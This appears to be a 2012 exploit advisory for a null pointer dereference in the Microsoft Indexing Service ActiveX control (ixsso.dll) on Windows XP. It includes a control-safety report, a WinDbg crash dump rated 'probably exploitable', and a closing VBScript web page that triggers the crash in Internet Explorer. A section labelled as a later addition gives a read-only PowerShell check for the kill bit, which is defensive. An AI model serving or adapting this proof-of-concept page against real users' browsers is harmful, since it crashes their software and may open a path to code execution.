Exploit Title: Microsoft Indexing Service Server-side (ixsso.dll) null pointer dereference
Crash : http://img836.imageshack.us/img836/7742/microsoftf.png
Date: 2012-08-24
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.microsoft.com/
Version: 5.1.2600.5512
Tested on: Windows XP SP3 ENG
Greets To Mohammad Morteza Sanaie
sanaie.morteza () gmail com
-----------------------------------------------------------------------------------------
Class CissoQuery
GUID: {A4463024-2B6F-11D0-BFBC-0020F8008024}
Number of Interfaces: 1
Default Interface: IixssoQuery
RegKey Safe for Script: True
RegkeySafe for Init: True
-----------------------------------------------------------------------------------------
Report for Clsid: {A4463024-2B6F-11D0-BFBC-0020F8008024}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller
-----------------------------------------------------------------------------------------
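Added defender-side check (not part of the original advisory): a read-only PowerShell snippet that looks up the CLSID from the report above and tells you whether the control is registered on the host, whether it is marked safe for scripting/initialising through the registry component categories, and whether the Internet Explorer kill bit is set for it. It assumes it runs on the host being audited; the function name is mine.

```powershell
# Added check, not from the original advisory. Read-only; run from an elevated prompt.
$clsid = '{A4463024-2B6F-11D0-BFBC-0020F8008024}'   # CissoQuery, from the advisory
$catSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForScripting
$catSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'  # CATID_SafeForInitializing

function Get-ActiveXExposure {
    param([string]$Clsid)
    $base = "HKLM:\SOFTWARE\Classes\CLSID\$Clsid"
    $r = @{ Clsid = $Clsid; Registered = (Test-Path $base) }
    if ($r.Registered) {
        # InprocServer32 default value is the DLL that implements the control
        $srv = Get-ItemProperty -Path "$base\InprocServer32" -ErrorAction SilentlyContinue
        $r.Server = $srv.'(default)'
        # Registry component categories are one way a control declares itself safe.
        # The advisory also shows "Implements IObjectSafety: True", so a control can
        # claim safety at runtime even when these keys are absent; absence alone does
        # not mean the control is unreachable from a web page.
        $cats = "$base\Implemented Categories"
        $r.SafeForScripting    = Test-Path "$cats\$catSafeForScripting"
        $r.SafeForInitializing = Test-Path "$cats\$catSafeForInitializing"
    }
    # Kill bit: IE refuses to instantiate the control when bit 0x400 is set here.
    $compat = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
    $flags = (Get-ItemProperty -Path $compat -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    $r.KillBitSet = ($flags -ne $null) -and (($flags -band 0x400) -ne 0)
    # Registered and not kill-bitted means IE will still load it from a page.
    $r.LoadableFromIE = $r.Registered -and -not $r.KillBitSet
    New-Object PSObject -Property $r |
        Select-Object Clsid, Server, Registered, SafeForScripting,
                      SafeForInitializing, KillBitSet, LoadableFromIE
}

Get-ActiveXExposure -Clsid $clsid | Format-List
```

If LoadableFromIE is True, the vendor-supported mitigation is to set the kill bit (Compatibility Flags DWORD 0x400 under the ActiveX Compatibility key) for this CLSID.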
(c8c.85c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=02e126d0 ecx=774fef18 edx=0020e5ea esi=0020e5c4 edi=00000000
eip=65da3d35 esp=02a4f070 ebp=02a4f098 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\ixsso.dll -
ixsso!DllCanUnloadNow+0xeac:
65da3d35 8b08 mov ecx,dword ptr [eax] ds:0023:00000000=????????
Missing image name, possible paged-out or corrupt data.
0:012> !load winext\msec.dll
0:012> !exploitable -v
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\OLEAUT32.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\mshtml.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\vbscript.dll -
Exception Faulting Address: 0x0
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Read Access Violation
Faulting Instruction:65da3d35 mov ecx,dword ptr [eax]
Basic Block:
65da3d35 mov ecx,dword ptr [eax]
Tainted Input Operands: eax
65da3d37 lea edx,[ebp+8]
65da3d3a push edx
65da3d3b push offset ixsso+0x1400 (65da1400)
65da3d40 push eax
Tainted Input Operands: eax
65da3d41 mov dword ptr [ebp+8],edi
65da3d44 mov dword ptr [ebp-0ch],edi
65da3d47 mov dword ptr [ebp-8],edi
65da3d4a mov dword ptr [ebp-4],edi
65da3d4d call dword ptr [ecx]
Tainted Input Operands: ecx, StackContents
Exception Hash (Major/Minor): 0x3716130a.0x43133e77
Stack Trace:
ixsso!DllCanUnloadNow+0xeac
OLEAUT32!DispCallFunc+0xc3
OLEAUT32!DispCallFunc+0x6d2
OLEAUT32!DispInvoke+0x23
ixsso!DllCanUnloadNow+0x391
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc86d3
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8ce9
mshtml!com_ms_osp_ospmrshl_releaseByValExternal+0xc8736
vbscript!DllGetClassObject+0x12b6d
vbscript!DllGetClassObject+0x12ae0
vbscript!DllGetClassObject+0x12a81
vbscript+0x3da8
vbscript+0x40bf
vbscript+0x6412
vbscript+0x6397
vbscript+0x6bed
vbscript+0x6de5
vbscript!DllCanUnloadNow+0x15b6
vbscript+0xa306
mshtml+0xa195b
mshtml+0xa1804
mshtml+0xa18f0
mshtml+0xa06f5
Instruction Address: 0x0000000065da3d35
Description: Data from Faulting Address controls Code Flow
Short Description: TaintedDataControlsCodeFlow
Exploitability Classification: PROBABLY_EXPLOITABLE
Recommended Bug Title: Probably Exploitable - Data from Faulting Address controls Code Flow starting at ixsso!DllCanUnloadNow+0x0000000000000eac (Hash=0x3716130a.0x43133e77)
The data from the faulting address is later used as the target for a branch.
-----------------------------------------------------------------------------------------
<html>
Exploit
<object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target'></object>
<script language='vbscript'>
targetFile = "C:\WINDOWS\system32\ixsso.dll"
prototype = "Property Let OnStartPage As object"
memberName = "OnStartPage"
progid = "Cisso.CissoQuery"
argCount = 1
Set arg1=Nothing
target.OnStartPage arg1
</script>
</html>